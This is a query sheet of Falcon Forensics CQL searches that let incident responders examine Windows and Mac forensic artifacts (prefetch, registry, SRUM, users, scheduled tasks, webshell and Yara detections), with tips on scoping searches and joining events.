#event_simpleName=PcaGeneralDbEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Line, SourceFileName, RuntimeStatus, RuntimeExitMessage, CommandLine, ImageFileName, FfcFileIdentifier, FileVersion, Description, AppVendor, ProgramUUID], limit=max)

PEInfo

Show all fields for PeHeaderInfo

#event_simpleName=PeHeaderInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, ModuleCharacteristics, ImageMachine, ImageNumberOfSections, ImageNumberOfSymbols, ImageSizeOfOptionalHeader, PeImageTimeStamp, FfcCollectionTag], limit=max)

Show all fields for PeHeaderOptionalInfo

#event_simpleName=PeHeaderOptionalInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, ImageEntryPoint, ImageBaseOfCode, PeImageBaseOfData, ImageCheckSum, DllCharacteristics, ImageFileAlignment, ImageBaseAddress, ImageLoaderFlags, ImageVersion, LinkerVersion, ImageOsVersion, ImageSubsystemVersion, ImageSectionAlignment, ImageSizeOfCode, ImageSizeOfHeaders, HeapCommit, HeapReserve, ImageSize, ImageSizeOfInitializedData, StackCommit, StackReserve, ImageSizeOfUninitializedData, ImageSubsystem, ImageWin32Version, FfcCollectionTag], limit=max)

Show all fields for PeSectionInfo

#event_simpleName=PeSectionInfo | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, TargetFileName, FfcFileIdentifier, PeSectionName, PeSectionByteAlignment, PeSectionCharacteristics, PeSectionEntropy, FfcCollectionTag, PeSectionStartVirtAddress, PeSectionEndVirtAddress], limit=max)

Pipes

Show all fields for NamedPipe

#event_simpleName=NamedPipe ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, NamedPipeName, NamedPipeAttributes, NamedPipeSizeBytes], limit=max)

Stack pipes by name

#event_simpleName=NamedPipe ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | groupBy(NamedPipeName)

Prefetch

Show all fields for PrefetchFile

#event_simpleName=PrefetchFile ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, PrefetchAccessedFile, PrefetchPath, ImageInternalName, PrefetchRunCount], limit=max)

Show runs of cmd.exe grouped by AID, which is useful if you have done several collections; change the groupBy to ForensicsCollectionIdentifier if you would rather group by collection:

#event_simpleName=PrefetchFile ForensicsCollectionIdentifier=* ImageInternalName=CMD.EXE | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | groupBy([aid], function=collect([PrefetchAccessedFile, PrefetchPath, PrefetchRunCount]))

PSList

Show all fields for ProcessRollup2

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime(format="%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, TargetProcessId, RawProcessId, ParentProcessId, SHA256HashData, SHA1HashData, MD5HashData, CommandLine, UserName, UserSid, UserSecurityDomain, WindowsProcessPriorityClass, SessionId, ProcessThreadInjectedStatus], limit=max)

Recentfiles

Recentfiles is now folded into the Dirlist-related events FileInfo, FileTimestampMetadata, and SignInfo. The queries in this section are the same ones found there.

Show All Fields for FileInfo

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, FileAttributes, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileOwnerSid, UserSid, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFileName, ProductName, ProductVersion], limit=max)

Show All Fields for FileTimestampMetadata

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileChangeType, FileAttributes, FfcFileIdentifier], limit=max)

Show All Fields for SignInfo

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MD5HashData, SHA1HashData, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

RecentExecutionTimestamp

Show all fields for RecentExecutionTimestamp

#event_simpleName=RecentExecutionTimestamp ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TimestampSourceType, ExecutablePath, UserSecurityDomain, UserSid, UserName, TargetFileName, FfcFileIdentifier, TaskSchedulerPath], limit=max)

Recycle

Show All Fields for FileDeleted

#event_simpleName=FileDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, SourceFileName, Size, UserSecurityDomain, UserName], limit=max)

Regdump

Show All Fields for RegGenericInfo

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%F %T", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

Count service DLLs

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* RegKeyName=CurrentControlSet RegValueName=servicedll | groupBy(RegKeyName, function=collect(RegValueName))

Accessibility Tools StartExe

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegObjectName = "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\" | (RegKeyName=osk OR RegKeyName=Narrator OR RegKeyName=magnifierpane) | RegValueName=StartExe | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%Y-%m-%d %H:%M:%S", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

You can remove the RegKeyName and RegValueName filters to see all accessibility registry keys. For example:

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegObjectName = "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\" | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%Y-%m-%d %H:%M:%S", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

Alternatively, plug in any RegKeyName to get that specific tool. The filter arguments can be combined with OR, AND, and NOT.

RegFeatureUsageInfo

Show all fields for RegFeatureUsageInfo

#event_simpleName=RegFeatureUsageInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| KeyCreationTimeStamp := parseTimestamp(field="KeyCreationTimeStamp", format=seconds)
| KeyCreationTimestamp := formatTime("%F %T", field=KeyCreationTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, KeyCreationTimestamp, UserName, AppName, TargetFileName, FfcFileIdentifier, FeatureUsageCount, FeatureUsageType, FullRegKeyPath, UserSecurityDomain], limit=max)

Regfile

Show All Fields for RegGenericInfo

#event_simpleName=RegGenericInfo ForensicsCollectionIdentifier=* | RegKeyLastWriteTime := parseTimeStamp(field=RegKeyLastWriteTime, format=seconds) | RegKeyLastWriteTime := formatTime("%F %T", field=RegKeyLastWriteTime) | table([ForensicsCollectionIdentifier, RegKeyLastWriteTime, RegKeyName, RegValueName, RegType, RegObjectName, RegStringValue, RegNumericValue, RegBinaryValue, TargetFileName], limit=max)

SDB

Show all fields for ShimDbTag

#event_simpleName=ShimDbTag ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SdbTagLocation, SdbTagLocationId, SdbTagSize, SdbTagType, SdbTagValueString], limit=max)

Services

Show all fields for ServiceStatusInfo

#event_simpleName=ServicesStatusInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ServiceDisplayName, ServiceType, ServiceStart, ServicePathUnquoted, ServiceCurrentState, ServiceStartType, ServiceTypeString, ServiceDisplayNameRegistry, ServiceDescription, ServiceRegLastWriteTime, ServiceObjectName, ServiceSid, ServiceIsWoW64, FfcServiceFlags, ErrorCode, TargetFileName, CommandLine, RawProcessId, FfcFileIdentifier], limit=max)

Shares

Show all fields for ResourceShareInfo

#event_simpleName=NetShareInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ShareName, ShareType, SharePermissions, ShareRemark, ShareCreatedFromCmdLine, SharePath, ShareTypeFlag], limit=max)

Shellbag

Show all fields for ShellBagInfo

#event_simpleName=ShellBagInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BagMruPath, FullRegKeyPath, BagEntryDescription, TargetFileName, BagPathType, FileAttributes, Size, BagEntryFlags, MftRecordId, MftSequenceNumber, BagEntryComment, UserName, UserSecurityDomain], limit=max)

Show all fields for ShellBagFileTimeStampMetadata

#event_simpleName=ShellBagFileTimeStampMetadata ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, FfcFileChangeType, FileAttributes, FullRegKeyPath, PosixFileType], limit=max)

Shim

Show all fields for RegShimCache

#event_simpleName=RegShimCache ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, FfcFileIdentifier, TargetFileName, RegConfigIndex, ModifyTime, UpdateTime, ExecFlag, RegControlsetId, ShimEntries, ShimMagicCode, ShimSizeInBytes], limit=max)

StartupInfo

Show all fields for AutoRunProcessInfo

#event_simpleName=AutoRunProcessInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | ParentProcessStartTime := parseTimeStamp(field=ParentProcessStartTime, format=seconds) | ParentProcessStartTime := formatTime("%F %T", field=ParentProcessStartTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, FfcAutoRunType, ImageFileName, BundleId, CommandLineParameters, UserSid, UserName, UserSecurityDomain, StartupLogonNumber, TargetProcessId, ProcessCpuUsageMicroSec, ProcessDiskUsageBytes, ParentBaseFileName, ParentProcessId, ParentProcessStartTime, ProcessStartedInTraceSec], limit=max)

SRUM

Show all fields for SruApplicationResourceUsage

#event_simpleName=SruApplicationResourceUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppBackgroundBytesRead, AppBackgroundBytesWritten, AppBackgroundContextSwitches, AppBackgroundCycleTime, AppBackgroundNumberOfFlushes, AppBackgroundNumReadOperations, AppBackgroundNumWriteOperations, AppFaceTime, AppForegroundBytesRead, AppForegroundBytesWritten, AppForegroundContextSwitches, AppForegroundCycleTime, AppForegroundNumberOfFlushes, AppForegroundNumReadOperations, AppForegroundNumWriteOperations, UserSid], limit=max)

Show all fields for SruNetworkDataUsage

#event_simpleName=SruNetworkDataUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, NetworkBytesReceived, NetworkBytesSent, NetLuidIndex, NetworkProfileFlags, NetworkProfileIndex, UserSid], limit=max)

Show all fields for SruNetworkConnectivityUsage

#event_simpleName=SruNetworkConnectivityUsage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppConnectedTimeString, NetLuidIndex, NetworkProfileFlags, NetworkProfileIndex, UserSid, SrudbEntryCreationTimeStamp], limit=max)

Show all fields for SruApplicationTimelineProvider

#event_simpleName=SruApplicationTimelineProvider ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SrudbTableName, SrudbTableIdString, AppName, AppAudioInSec, AppAudioInTimeline, AppAudioOutSec, AppAudioOutTimeline, AppCpuTimeline, AppDiskRaw, AppDiskTimeline, AppDisplayRequiredSec, AppDisplayRequiredTimeline, AppDurationMilliSec, AppEndTime, AppFlags, AppInFocusSec, AppInFocusTimeline, AppKeyboardInputSec, AppKeyboardInputTimeline, AppMouseInputSec, AppMBBBytesRaw, AppMBBTailRaw, AppMBBTimeline, AppNetworkBytesRaw, AppNetworkTailRaw, AppNetworkTimeline, AppUserInputSec, AppUserInputTimeline, AppTimelineEnd, UserSid], limit=max)

Superfetch

Show all fields for SuperfetchAppInfo

#event_simpleName=SuperfetchAppInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ImageFileName, SuperfetchAccessedFile, SuperfetchAppLaunchCount, SuperfetchAppForegroundCount], limit=max)

Show all fields for SuperfetchAppSchedule

#event_simpleName=SuperfetchAppSchedule ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ImageFileName, AppScheduleString], limit=max)

SysCache

Show all fields for SyscacheEntry

#event_simpleName=SyscacheEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, SyscacheFileInUse, MftRecordId, MftSequenceNumber, ProgramUUID, SHA1HashData, USN, UsnJournalId], limit=max)

Tasks

Show all fields for ScheduledTaskInfo

#event_simpleName=ScheduledTaskInfo ForensicsCollectionIdentifier=* | TaskSchedulerRegisterDate := parseTimeStamp(field=TaskSchedulerRegisterDate, format=seconds) | TaskSchedulerRegisterDate := formatTime("%F %T", field=TaskSchedulerRegisterDate) | table([TaskSchedulerRegisterDate, aid, ForensicsCollectionIdentifier, TaskApiType, TaskSchedulerAllowDemandStart, TaskSchedulerAllowHardTerminate, TaskExecArguments, TaskAuthor, TaskSchedulerUserContext, TaskSchedulerTaskData, TaskSchedulerDeleteExpiredTaskAfter, Description, TaskSchedulerDisallowStartIfOnBatteries, TaskDisplayName, TaskDocumentation, TaskEnabled, TaskSchedulerExecId, ImageFileName, TaskSchedulerActionType, TaskSchedulerExecutionTimeLimit, TaskSchedulerLastTaskResult, TaskSchedulerGroupId, TaskSchedulerPrincipalType, TaskSchedulerHidden, TaskSchedulerLogonType, TaskName, TaskSchedulerNumberOfMissedRuns, TaskSchedulerPath, TaskSchedulerRestartCount, TaskSchedulerRestartInterval, TaskSchedulerRunLevel, TaskSchedulerRunOnlyIfIdle, TaskSchedulerRunOnlyIfNetworkAvailable, TaskSchedulerStartWhenAvailable, TaskSchedulerTaskState, TaskSchedulerStopIfGoingOnBatteries, TaskSchedulerTaskSource, URI, UserName, TaskSchedulerTaskVersion, TaskSchedulerWakeToRun, TaskPriority, TaskWorkingDirectory], limit=max)

Timeline

Show all fields for WindowsTimelineEntry

#event_simpleName=WindowsTimelineEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ActivityId, SourceFileName, ParentActivityId, WindowsTimelineEntryActivityStatus, WindowsTimelineEntryActivityType, AppIdentificationData, JSONPayload, UserSecurityDomain, UserName, UserProfile, WindowsTimelineEntryPlatformDeviceId, WindowsTimelineEntryGroup, WindowsTimelineEntryTag], limit=max)

Show all fields for WindowsTimelineEntryTimestamp

#event_simpleName=WindowsTimelineEntryTimestamp ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, ActivityId, WindowsTimelineEntryTimestampType], limit=max)

UAL

Show all fields for UserAccessLogEntry

#event_simpleName=UserAccessLogEntry ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, SourceAccountUserName, UalServerRoleGuid, UalServerRoleName, UalTimeType, UalServerProductName, SourceEndpointAddressIP4, SourceEndpointAddressIP6, UalTotalAccesses, TargetFileName, FfcFileIdentifier, UalClientName], limit=max)

UserAssist

Show All Fields for UserAssistAppLaunchInfo

#event_simpleName=UserAssistAppLaunchInfo ForensicsCollectionIdentifier=* | UserAssistLastRunTimeStamp := parseTimeStamp(field=UserAssistLastRunTimeStamp, format=seconds) | UserAssistLastRunTimeStamp := formatTime("%F %T", field=UserAssistLastRunTimeStamp) | table([UserAssistLastRunTimeStamp, aid, ForensicsCollectionIdentifier, UserName, UserSecurityDomain, UserAssistMenuItem, UserAssistMenuFolder, UserAssistRegistryId, SessionId, UserAssistLaunchCount], limit=max)

USB

Show all fields for UsbDeviceInfo

#event_simpleName=UsbDeviceInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | DeviceLastWriteTimeStamp := parseTimeStamp(field=DeviceLastWriteTimeStamp, format=seconds) | DeviceLastWriteTimeStamp := formatTime("%Y-%m-%d %H:%M:%S", field=DeviceLastWriteTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, DeviceClassString, DeviceManufacturer, DeviceProduct, DevicePropertyPhysicalDeviceObjectName, VolumeDriveLetter, DevicePropertyFriendlyName, DeviceLastWriteTimeStamp, DeviceService, DeviceServiceDescription, DeviceHardwareVersion, DeviceTypeString, VolumeDeviceVendor], limit=max)

USNJournal

Show All Fields for USNRecord

#event_simpleName=USNRecord ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, USN, USNChangeReasons, FileAttributes, FileName, TargetFileName, FilePath, FileReferenceNumber, ParentFileReferenceNumber], limit=max)

Users

Show All Fields for UserIdentity

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([aid, ForensicsCollectionIdentifier, LogonDomain, UserName, UserSystemComment, UserComment, LastLogonTime, AccountExpirationTime, AccountNeverExpires, PasswordLastSet, UserIsEnabled, UserIsAdmin, UserIsGuest, RemoteAccount, LogonCount, FailedLogonCount, UserSid, UserSidType, UserSidInfo, UserProfile, PrimaryDisplayName], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName])

List of Users by Count

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | groupBy(UserName) | sort(_count)

Show Guest users who have been added to the local administrators group

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* UserIsGuest=1 UserIsAdmin=1 | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([aid, ForensicsCollectionIdentifier, UserName, LastLogonTime, AccountExpirationTime, AccountNeverExpires, PasswordLastSet, UserIsEnabled, UserIsAdmin, LogonCount, FailedLogonCount], limit=max)

Sort user logins by most recent

#event_simpleName=UserIdentity ForensicsCollectionIdentifier=* | LastLogonTime := parseTimeStamp(field=LastLogonTime, format=seconds) | LastLogonTime := formatTime("%F %T", field=LastLogonTime) | table([aid, ForensicsCollectionIdentifier, UserName, UserSystemComment, UserComment, LastLogonTime, UserIsEnabled, UserIsAdmin, UserIsGuest, RemoteAccount, LogonCount, FailedLogonCount, UserSid, UserSidType, UserSidInfo, UserProfile, PrimaryDisplayName], limit=max) | sort(LastLogonTime, order=desc)

Webshell

Show all fields for WebShellDetected

#event_simpleName=WebShellDetected ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, FfcWebShellProbability, FfcPatternsTotalScore, FfcPatternsTotalHits, FfcPatternWithMostHits, ForensicsText], limit=max)

WMI

Show all fields for WmiQuery

#event_simpleName=WmiQuery ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, WmiQuery, WmiNamespaceName, WmiQueryProperties, WmiQueryResult, WmiQueryStatus], limit=max)

WlanInterfaceInfo

#event_simpleName=WlanInterfaceInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, SSID, NetworkInterfaceGuid, Description, WlanProfileName, WlanFlags, Dot11BssType, Dot11AuthAlgorithm, Dot11CipherAlgorithm, BSSIDList, BSSIDCount, NetworkConnectable, WlanNotConnectableReason, WlanSignalQuality, RSSI, WlanInterfaceState, WlanSecurityEnabled], limit=max)

Yara

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanRuleName, TargetFileName, FfcFileIdentifier, TargetProcessId, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

ZIP

Show all fields for ArchiveInfo

#event_simpleName=ArchiveInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ArchiveType, Size, ArchiveEncryptionMethod, ArchiveCompressionMethod], limit=max)

Show all fields for ArchiveMemberInfo

#event_simpleName=ArchiveMemberInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ArchiveUncompressedSize, ArchiveIndex, ArchiveFileName, Size, ArchiveCrc, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

Falcon Forensics Query Sheet for Mac

Example queries to use in advanced event search to investigate Forensics data ingested from Mac hosts.

Tips for searches

Improve the efficiency and effectiveness of your Falcon Forensics searches by using ForensicsCollectionIdentifier, AID, and certain techniques to limit the scope of data, leverage joins efficiently, and take advantage of grouping functions. You can also apply case-sensitivity options for more precise results.

When searching, use ForensicsCollectionIdentifier or AID to reduce the search time. Falcon Forensics can create many events, which can take a long time to parse through; scoping the search to a Collection ID or AID cuts that time down. This recommendation doesn't apply if you're searching environment-wide, of course. If you're looking for a specific file, try the FileInfo event.

Regarding FfcFileIdentifier: these are only going to be useful within the specific collection, as it uses the filesystem's UUID and the file's inode value. Because of this, the FfcFileIdentifier will be different across many machines. It's recommended to use this identifier to tie events together from a single collection, as many events have this field versus something like the SHA256 hash.

Joins can be rather resource-intensive, so the best way to do them is to limit the amount of data first by filtering on ForensicsCollectionIdentifier or AID. You can do a join without these, but the searches may take more time and may be limited. If you're searching for a commonality across your environment, any filtering criteria will do, except that FfcFileIdentifier won't work across hosts because it is unique to each system. You can use joins in any searches that share common fields.

In the searches on this page, you'll notice many groupBy statements, and these are some of the best ways to group values together. For example, if you're looking for a specific hash you would group by SHA256HashData while collecting other important fields. This groups all of the resultant data into a table.

These are examples of case sensitivity in searches.
  • HostName=Test only matches hosts named "Test"
  • HostName=/test/i matches test, Test, TeSt, or any similar combination
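The query below, which is an added example and not part of the query sheet, puts those tips together: both sides of the join are scoped to one collection, Yara hits (FfcBytePatternScanResult) are tied to execution evidence (RecentExecutionTimestamp) through FfcFileIdentifier, and the result is grouped by SHA256HashData so each flagged file appears once with its collected context. The `<collection id>` placeholder and the exact join()/groupBy() argument layout are assumptions; every field name comes from the queries on this sheet.

```cql
// Added example, not from the query sheet. Replace <collection id> with the
// ForensicsCollectionIdentifier of the collection you are investigating.
// Scoping BOTH the outer query and the join subquery keeps the join cheap.
#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier="<collection id>"
| join({#event_simpleName=RecentExecutionTimestamp ForensicsCollectionIdentifier="<collection id>"
        | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
        | LastExecuted := formatTime("%F %T", field=ContextTimeStamp)},
       field=FfcFileIdentifier, include=[LastExecuted, ExecutablePath, UserName], mode=inner)
// One row per flagged hash, with every rule, execution time and user collected.
| groupBy([SHA256HashData, TargetFileName],
          function=[collect([FfcScanRuleName, LastExecuted, ExecutablePath, UserName]), count()])
| sort(_count, order=desc)
```

Because FfcFileIdentifier is built from the filesystem UUID and inode, this join only makes sense inside a single collection; to look for the same file across hosts, join on SHA256HashData instead and drop the collection scope.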

System

ForensicsCollectorOnline

Show all Fields

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform=FFC_PLATFORM_DARWIN | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath, PhysicalAddress, LocalAddressIP4, LocalAddressIP6], limit=max)

ForensicsCollectorOffline

Show all Fields

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform=FFC_PLATFORM_DARWIN | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)

